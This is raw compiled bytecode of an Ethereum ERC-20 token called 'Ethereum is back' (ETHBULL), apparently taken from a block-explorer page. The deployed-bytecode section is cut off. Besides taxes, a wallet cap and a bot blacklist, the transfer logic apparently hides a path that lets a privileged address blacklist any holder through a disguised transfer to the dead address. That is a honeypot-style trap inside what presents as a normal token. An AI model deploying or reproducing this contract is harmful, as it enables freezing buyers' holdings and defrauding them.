608060405261dead60065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505f60075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600c600855600c6009556040518060400160405280601081526020017f457468657265756d206973206261636b00000000000000000000000000000000815250600a90816100d49190610afa565b506040518060400160405280600781526020017f45544842554c4c00000000000000000000000000000000000000000000000000815250600b90816101199190610afa565b506009600c5f6101000a81548160ff021916908360ff1602179055506705d697537a8f2000600d555f600f5f6101000a81548160ff021916908360ff1602179055506001600f60016101000a81548160ff021916908360ff1602179055505f6010555f6011555f6012556010546013556011546014556012546015556101be60646101b06064600d5461074c60201b90919060201c565b61076160201b90919060201c565b6016556016546017556001601960156101000a81548160ff0219169083151502179055506001601960166101000a81548160ff02191690831515021790555061021961020e61077660201b60201c565b61077d60201b60201c565b60646002600d5461022a9190610bf6565b6102349190610c64565b60015f61024561083e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060646062600d546102939190610bf6565b61029d9190610c64565b60015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506102ec61077660201b60201c565b60055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505f737a250d5630b4cf539739df2c5dacb4c659f2488d90508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561038c573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906103b09190610cf2565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610415573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104399190610cf2565b6040518363ffffffff1660e01b8152600401610456929190610d2c565b6020604051808303815f875af1158015610472573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104969190610cf2565b60195f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060185f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061053161052661083e60201b60201c565b61086560201b60201c565b6105403061086560201b60201c565b61057060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661086560201b60201c565b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60025f6105a261083e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061064961083e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60646002600d546106a89190610bf6565b6106b29190610c64565b6040516106bf9190610d62565b60405180910390a33073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60646062600d546107279190610bf6565b6107319190610c64565b60405161073e9190610d62565b60405180910390a350610d7b565b5f81836107599190610bf6565b905092915050565b5f818361076e9190610c64565b905092915050565b5f33905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600160035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061093857607f821691505b60208210810361094b5761094a6108f4565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026109ad7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610972565b6109b78683610972565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6109fb6109f66109f1846109cf565b6109d8565b6109cf565b9050919050565b5f819050919050565b610a14836109e1565b610a28610a2082610a02565b84845461097e565b825550505050565b5f5f905090565b610a3f610a30565b610a4a818484610a0b565b505050565b5b81811015610a6d57610a625f82610a37565b600181019050610a50565b5050565b601f821115610ab257610a8381610951565b610a8c84610963565b81016020851015610a9b578190505b610aaf610aa785610963565b830182610a4f565b50505b505050565b5f82821c905092915050565b5f610ad25f1984600802610ab7565b1980831691505092915050565b5f610aea8383610ac3565b9150826002028217905092915050565b610b03826108bd565b67ffffffffffffffff811115610b1c57610b1b6108c7565b5b610b268254610921565b610b31828285610a71565b5f60209050601f831160018114610b62575f8415610b50578287015190505b610b5a8582610adf565b865550610bc1565b601f198416610b7086610951565b5f5b82811015610b9757848901518255600182019150602085019450602081019050610b72565b86831015610bb45784890151610bb0601f891682610ac3565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610c00826109cf565b9150610c0b836109cf565b9250828202610c19816109cf565b91508282048414831517610c3057610c2f610bc9565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f610c6e826109cf565b9150610c79836109cf565b925082610c8957610c88610c37565b5b828204905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610cc182610c98565b9050919050565b610cd181610cb7565b8114610cdb575f5ffd5b50565b5f81519050610cec81610cc8565b92915050565b5f60208284031215610d0757610d06610c94565b5b5f610d1484828501610cde565b91505092915050565b610d2681610cb7565b82525050565b5f604082019050610d3f5f830185610d1d565b610d4c6020830184610d1d565b9392505050565b610d5c816109cf565b82525050565b5f602082019050610d755f830184610d53565b92915050565b612c2280610d885f395ff3fe608060405260043610610169575f3560e01c8063590f897e116100d05780638da5cb5b11610089578063a9059cbb11610063578063a9059cbb1461052a578063dd62ed3e14610566578063ddbf5266146105a2578063f2fde38b146105ca57610170565b80638da5cb5b1461049a57806395d89b41146104c4578063a457c2d7146104ee57610170565b8063590f897e146103a257806370a08231146103cc578063715018a61461040857806378109e541461041e57806385e15a52146104485780638a8c523c1461048457610170565b806323b872dd1161012257806323b872dd14610282578063313ce567146102be57806339509351146102e857806340b9a54b1461032457806349bd5a5e1461034e5780634a74bb021461037857610170565b806306fdde0314610174578063095ea7b31461019e57806313fad07a146101da5780631694505e1461020457806318160ddd1461022e578063220f66961461025857610170565b3661017057005b5f5ffd5b34801561017f575f5ffd5b506101886105f2565b604051610195919061206f565b60405180910390f35b3480156101a9575f5ffd5b506101c460048036038101906101bf9190612120565b610682565b6040516101d19190612178565b60405180910390f35b3480156101e5575f5ffd5b506101ee61069f565b6040516101fb9190612178565b60405180910390f35b34801561020f575f5ffd5b506102186106b2565b60405161022591906121ec565b60405180910390f35b348015610239575f5ffd5b506102426106d7565b60405161024f9190612214565b60405180910390f35b348015610263575f5ffd5b5061026c6106e0565b6040516102799190612178565b60405180910390f35b34801561028d575f5ffd5b506102a860048036038101906102a3919061222d565b6106f3565b6040516102b59190612178565b60405180910390f35b3480156102c9575f5ffd5b506102d26107d3565b6040516102df9190612298565b60405180910390f35b3480156102f3575f5ffd5b5061030e60048036038101906103099190612120565b6107e8565b60405161031b9190612178565b60405180910390f35b34801561032f575f5ffd5b50610338610896565b6040516103459190612214565b60405180910390f35b348015610359575f5ffd5b5061036261089c565b60405161036f91906122c0565b60405180910390f35b348015610383575f5ffd5b5061038c6108c1565b6040516103999190612178565b60405180910390f35b3480156103ad575f5ffd5b506103b66108d4565b6040516103c39190612214565b60405180910390f35b3480156103d7575f5ffd5b506103f260048036038101906103ed91906122d9565b6108da565b6040516103ff9190612214565b60405180910390f35b348015610413575f5ffd5b5061041c610920565b005b348015610429575f5ffd5b50610432610933565b60405161043f9190612214565b60405180910390f35b348015610453575f5ffd5b5061046e600480360381019061046991906122d9565b610939565b60405161047b9190612178565b60405180910390f35b34801561048f575f5ffd5b50610498610956565b005b3480156104a5575f5ffd5b506104ae610ab7565b6040516104bb91906122c0565b60405180910390f35b3480156104cf575f5ffd5b506104d8610ade565b6040516104e5919061206f565b60405180910390f35b3480156104f9575f5ffd5b50610514600480360381019061050f9190612120565b610b6e565b6040516105219190612178565b60405180910390f35b348015610535575f5ffd5b50610550600480360381019061054b9190612120565b610c36565b60405161055d9190612178565b60405180910390f35b348015610571575f5ffd5b5061058c60048036038101906105879190612304565b610c56565b6040516105999190612214565b60405180910390f35b3480156105ad575f5ffd5b506105c860048036038101906105c39190612342565b610cd8565b005b3480156105d5575f5ffd5b506105f060048036038101906105eb91906122d9565b610d65565b005b6060600a80546106019061239a565b80601f016020809104026020016040519081016040528092919081815260200182805461062d9061239a565b80156106785780601f1061064f57610100808354040283529160200191610678565b820191905f5260205f20905b81548152906001019060200180831161065b57829003601f168201915b5050505050905090565b5f61069561068e610de7565b8484610dee565b6001905092915050565b601960169054906101000a900460ff1681565b60185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f600d54905090565b601960149054906101000a900460ff1681565b5f6106ff848484610f7c565b8094508195508296505050506107c884610717610de7565b6107c385604051806060016040528060288152602001612ba06028913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61077a610de7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546118079092919063ffffffff16565b610dee565b600190509392505050565b5f600c5f9054906101000a900460ff16905090565b5f61088c6107f4610de7565b846108878560025f610804610de7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461185b90919063ffffffff16565b610dee565b6001905092915050565b60115481565b60195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601960159054906101000a900460ff1681565b60125481565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610928611870565b6109315f6118ee565b565b60165481565b6003602052805f5260405f205f915054906101000a900460ff1681565b61095e611870565b6109aa3060185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff610dee565b60185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71947306109f2306108da565b5f5f6109fc610ab7565b426040518863ffffffff1660e01b8152600401610a1e96959493929190612403565b60606040518083038185885af1158015610a3a573d5f5f3e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610a5f9190612476565b5050506001601960156101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc1596001604051610aad9190612178565b60405180910390a1565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600b8054610aed9061239a565b80601f0160208091040260200160405190810160405280929190818152602001828054610b199061239a565b8015610b645780601f10610b3b57610100808354040283529160200191610b64565b820191905f5260205f20905b815481529060010190602001808311610b4757829003601f168201915b5050505050905090565b5f610c2c610b7a610de7565b84610c2785604051806060016040528060258152602001612bc86025913960025f610ba3610de7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546118079092919063ffffffff16565b610dee565b6001905092915050565b5f610c49610c42610de7565b8484610f7c565b5050506001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ce0611870565b601960149054906101000a900460ff1615610d30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2790612510565b60405180910390fd5b5f610d3a306108da565b90505f60648383610d4b919061255b565b610d5591906125c9565b9050610d60816119af565b505050565b610d6d611870565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd290612669565b60405180910390fd5b610de4816118ee565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015610e5657505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b610e95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8c906126d1565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f6f9190612214565b60405180910390a3505050565b5f5f5f610f87610ab7565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415801561100f575060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b801561104757503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156110a0575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156110f9575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156111385750611108610ab7565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b1561119b575f611147866108da565b9050601654858261115891906126ef565b1115611199576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611190906127b8565b60405180910390fd5b505b60045f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611225576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121c90612820565b60405180910390fd5b60035f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156112c8575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b8015611301575061dead73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b801561132257506103e884611315886108da565b61131f919061283e565b11155b1561138757600160045f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508585925092506117fe565b5f73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16141580156113ef57505f73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b61142e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611425906128bb565b60405180910390fd5b5f8411611470576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146790612949565b60405180910390fd5b600f60019054906101000a900460ff1660ff16600f5f9054906101000a900460ff1660ff16101580156114b05750601960149054906101000a900460ff16155b8015611509575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b80156115215750601960159054906101000a900460ff165b15611560575f600f5f6101000a81548160ff021916908360ff1602179055505f61154a306108da565b90505f81111561155e5761155d816119af565b5b505b5f6001905060035f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff166115b7578491505b60035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611652575060035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b8061171b5750601960169054906101000a900460ff1680156116c1575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614155b801561171a575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b5b15611728575f90506117ea565b60195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff160361178a576011546010819055506117e9565b60195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16036117e8576012546010819055505b5b5b6117f687878784611a20565b868693509350505b93509350939050565b5f83831115829061184e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611845919061206f565b60405180910390fd5b5082840390509392505050565b5f818361186891906126ef565b905092915050565b611878610de7565b73ffffffffffffffffffffffffffffffffffffffff16611896610ab7565b73ffffffffffffffffffffffffffffffffffffffff16146118ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e3906129b1565b60405180910390fd5b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6001601960146101000a81548160ff0219169083151502179055506119d381611a89565b5f479050611a0260055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1682611cbf565b505f601960146101000a81548160ff02191690831515021790555050565b80611a3257611a2d611d07565b611a6a565b600f5f81819054906101000a900460ff1680929190611a50906129cf565b91906101000a81548160ff021916908360ff160217905550505b611a75848484611d5d565b80611a8357611a82611f8b565b5b50505050565b5f600267ffffffffffffffff811115611aa557611aa46129f7565b5b604051908082528060200260200182016040528015611ad35781602001602082028036833780820191505090505b50905030815f81518110611aea57611ae9612a24565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611b8e573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611bb29190612a65565b81600181518110611bc657611bc5612a24565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611c2c3060185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610dee565b60185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401611c8e959493929190612b47565b5f604051808303815f87803b158015611ca5575f5ffd5b505af1158015611cb7573d5f5f3e3d5ffd5b505050505050565b8173ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015611d02573d5f5f3e3d5ffd5b505050565b5f601054148015611d1957505f601154145b8015611d2657505f601254145b611d5b576011546014819055506012546015819055506010546013819055505f6011819055505f6012819055505f6010819055505b565b5f5f611d6883611fa8565b91509150611dbc8360015f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611fea90919063ffffffff16565b60015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611e4d8260015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461185b90919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611ede8160015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461185b90919063ffffffff16565b60015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611f7c9190612214565b60405180910390a35050505050565b601354601081905550601454601181905550601554601281905550565b5f5f5f606460105485611fbb919061255b565b611fc591906125c9565b90505f611fdb8286611fea90919063ffffffff16565b90508082935093505050915091565b5f8183611ff7919061283e565b905092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61204182611fff565b61204b8185612009565b935061205b818560208601612019565b61206481612027565b840191505092915050565b5f6020820190508181035f8301526120878184612037565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6120bc82612093565b9050919050565b6120cc816120b2565b81146120d6575f5ffd5b50565b5f813590506120e7816120c3565b92915050565b5f819050919050565b6120ff816120ed565b8114612109575f5ffd5b50565b5f8135905061211a816120f6565b92915050565b5f5f604083850312156121365761213561208f565b5b5f612143858286016120d9565b92505060206121548582860161210c565b9150509250929050565b5f8115159050919050565b6121728161215e565b82525050565b5f60208201905061218b5f830184612169565b92915050565b5f819050919050565b5f6121b46121af6121aa84612093565b612191565b612093565b9050919050565b5f6121c58261219a565b9050919050565b5f6121d6826121bb565b9050919050565b6121e6816121cc565b82525050565b5f6020820190506121ff5f8301846121dd565b92915050565b61220e816120ed565b82525050565b5f6020820190506122275f830184612205565b92915050565b5f5f5f606084860312156122445761224361208f565b5b5f612251868287016120d9565b9350506020612262868287016120d9565b92505060406122738682870161210c565b9150509250925092565b5f60ff82169050919050565b6122928161227d565b82525050565b5f6020820190506122ab5f830184612289565b92915050565b6122ba816120b2565b82525050565b5f6020820190506122d35f8301846122b1565b92915050565b5f602082840312156122ee576122ed61208f565b5b5f6122fb848285016120d9565b91505092915050565b5f5f6040838503121561231a5761231961208f565b5b5f612327858286016120d9565b9250506020612338858286016120d9565b9150509250929050565b5f602082840312156123575761235661208f565b5b5f6123648482850161210c565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806123b157607f821691505b6020821081036123c4576123c361236d565b5b50919050565b5f819050919050565b5f6123ed6123e86123e3846123ca565b612191565b6120ed565b9050919050565b6123fd816123d3565b82525050565b5f60c0820190506124165f8301896122b1565b6124236020830188612205565b61243060408301876123f4565b61243d60608301866123f4565b61244a60808301856122b1565b61245760a0830184612205565b979650505050505050565b5f81519050612470816120f6565b92915050565b5f5f5f6060848603121561248d5761248c61208f565b5b5f61249a86828701612462565b93505060206124ab86828701612462565b92505060406124bc86828701612462565b9150509250925092565b7f43757272656e746c792070726f63657373696e672c20747279206c617465722e5f82015250565b5f6124fa602083612009565b9150612505826124c6565b602082019050919050565b5f6020820190508181035f830152612527816124ee565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f612565826120ed565b9150612570836120ed565b925082820261257e816120ed565b915082820484148315176125955761259461252e565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6125d3826120ed565b91506125de836120ed565b9250826125ee576125ed61259c565b5b828204905092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f612653602683612009565b915061265e826125f9565b604082019050919050565b5f6020820190508181035f83015261268081612647565b9050919050565b7f4552523a207a65726f20616464726573730000000000000000000000000000005f82015250565b5f6126bb601183612009565b91506126c682612687565b602082019050919050565b5f6020820190508181035f8301526126e8816126af565b9050919050565b5f6126f9826120ed565b9150612704836120ed565b925082820190508082111561271c5761271b61252e565b5b92915050565b7f596f752061726520747279696e6720746f2062757920746f6f206d616e7920745f8201527f6f6b656e732e20596f752068617665207265616368656420746865206c696d6960208201527f7420666f72206f6e652077616c6c65742e000000000000000000000000000000604082015250565b5f6127a2605183612009565b91506127ad82612722565b606082019050919050565b5f6020820190508181035f8301526127cf81612796565b9050919050565b7f426f74206973206e6f7420616c6c6f77656400000000000000000000000000005f82015250565b5f61280a601283612009565b9150612815826127d6565b602082019050919050565b5f6020820190508181035f830152612837816127fe565b9050919050565b5f612848826120ed565b9150612853836120ed565b925082820390508181111561286b5761286a61252e565b5b92915050565b7f4552523a205573696e67203020616464726573732100000000000000000000005f82015250565b5f6128a5601583612009565b91506128b082612871565b602082019050919050565b5f6020820190508181035f8301526128d281612899565b9050919050565b7f546f6b656e2076616c7565206d75737420626520686967686572207468616e205f8201527f7a65726f2e000000000000000000000000000000000000000000000000000000602082015250565b5f612933602583612009565b915061293e826128d9565b604082019050919050565b5f6020820190508181035f83015261296081612927565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61299b602083612009565b91506129a682612967565b602082019050919050565b5f6020820190508181035f8301526129c88161298f565b9050919050565b5f6129d98261227d565b915060ff82036129ec576129eb61252e565b5b600182019050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050612a5f816120c3565b92915050565b5f60208284031215612a7a57612a7961208f565b5b5f612a8784828501612a51565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b612ac2816120b2565b82525050565b5f612ad38383612ab9565b60208301905092915050565b5f602082019050919050565b5f612af582612a90565b612aff8185612a9a565b9350612b0a83612aaa565b805f5b83811015612b3a578151612b218882612ac8565b9750612b2c83612adf565b925050600181019050612b0d565b5085935050505092915050565b5f60a082019050612b5a5f830188612205565b612b6760208301876123f4565b8181036040830152612b798186612aeb565b9050612b8860608301856122b1565b612b956080830184612205565b969550505050505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212205c5c3a746e617d1f0e34843a48fd89029a975751375033eb59b5c0498f02ea8864736f6c634300081c0033

Deployed Bytecode

0x608060405260043610610169575f3560e01c8063590f897e116100d05780638da5cb5b11610089578063a9059cbb11610063578063a9059cbb1461052a578063dd62ed3e14610566578063ddbf5266146105a2578063f2fde38b146105ca57610170565b80638da5cb5b1461049a57806395d89b41146104c4578063a457c2d7146104ee57610170565b8063590f897e146103a257806370a08231146103cc578063715018a61461040857806378109e541461041e57806385e15a52146104485780638a8c523c1461048457610170565b806323b872dd1161012257806323b872dd14610282578063313ce567146102be57806339509351146102e857806340b9a54b1461032457806349bd5a5e1461034e5780634a74bb021461037857610170565b806306fdde0314610174578063095ea7b31461019e57806313fad07a146101da5780631694505e1461020457806318160ddd1461022e578063220f66961461025857610170565b3661017057005b5f5ffd5b34801561017f575f5ffd5b506101886105f2565b604051610195919061206f565b60405180910390f35b3480156101a9575f5ffd5b506101c460048036038101906101bf9190612120565b610682565b6040516101d19190612178565b60405180910390f35b3480156101e5575f5ffd5b506101ee61069f565b6040516101fb9190612178565b60405180910390f35b34801561020f575f5ffd5b506102186106b2565b60405161022591906121ec565b60405180910390f35b348015610239575f5ffd5b506102426106d7565b60405161024f9190612214565b60405180910390f35b348015610263575f5ffd5b5061026c6106e0565b6040516102799190612178565b60405180910390f35b34801561028d575f5ffd5b506102a860048036038101906102a3919061222d565b6106f3565b6040516102b59190612178565b60405180910390f35b3480156102c9575f5ffd5b506102d26107d3565b6040516102df9190612298565b60405180910390f35b3480156102f3575f5ffd5b5061030e60048036038101906103099190612120565b6107e8565b60405161031b9190612178565b60405180910390f35b34801561032f575f5ffd5b50610338610896565b6040516103459190612214565b60405180910390f35b348015610359575f5ffd5b5061036261089c565b60405161036f91906122c0565b60405180910390f35b348015610383575f5ffd5b5061038c6108c1565b6040516103999190612178565b60405180910390f35b3480156103ad575f5ffd5b506103b66108d4565b6040516103c39190612214565b60405180910390f35b3480156103d7575f5ffd5b506103f260048036038101906103ed91906122d9565b6108da565b6040516103ff9190612214565b60405180910390f35b348015610413575f5ffd5b5061041c610920565b005b348015610429575f5ffd5b50610432610933565b60405161043f9190612214565b60405180910390f35b348015610453575f5ffd5b5061046e600480360381019061046991906122d9565b610939565b60405161047b9190612178565b60405180910390f35b34801561048f575f5ffd5b50610498610